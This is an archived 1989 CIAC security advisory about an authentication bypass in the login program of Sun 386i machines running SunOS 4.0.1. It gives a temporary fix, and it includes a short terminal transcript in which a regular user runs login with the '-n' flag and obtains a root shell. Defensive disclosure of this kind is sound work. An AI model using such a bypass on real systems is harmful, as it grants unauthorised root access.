textfiles/hacking/386i.txt

55 lines
1.9 KiB
Plaintext
Raw Permalink Normal View History

2021-04-15 11:31:59 -07:00
________________________________________________________________
THE COMPUTER INCIDENT ADVISORY CAPABILITY
CIAC
ADVISORY NOTICE
________________________________________________________________
COMPUTER SECURITY INFORMATION
Authentication bypass in Sun 386i machines
The login program supplied by Sun for its 386i machines, version 4.0.1 of Sun
OS (SOS), accepts the argument "-n" which bypasses authentication. It was
apparently added in order to allow the Sun program "logintool" to do the
authentication and have login do the housekeeping. This allows a user who
discovers the new argument to the login program to become a root user in
several ways. An example of one method is attached.
A temporary solution is to disable logintool and patch the binary using
the "strings" and "adb"method used last November. Alternatively and more
simly, log in a root and issue the command
chmod 110 /bin/login
Example of login endrun:
---------------------------------------------------
Script started on Tue Apr 11 14:16:25 1989
myhost[1] whoami
oconnor
myhost[2] /bin/login -n root
Login incorrect
login: onceuponatime
No home directory specified in password file! Logging in with home=/
# whoami
root
# who a i
myhost!onceupon ttyp2 Apr 11 14:17
# ^D myhost1[3] ^D
script done on Tue Apr 11 14:17:34 1989
---------------------------------------------------
Sun is presently working on a patch. When it is available, CIAC will
inform you accordingly.
For questions or additional information, please contact
Gene Schultz
CIAC Team Leader
(415) 422-8193 or FTS 532-8193
gschultz%nsspa@icdc.llnl.gov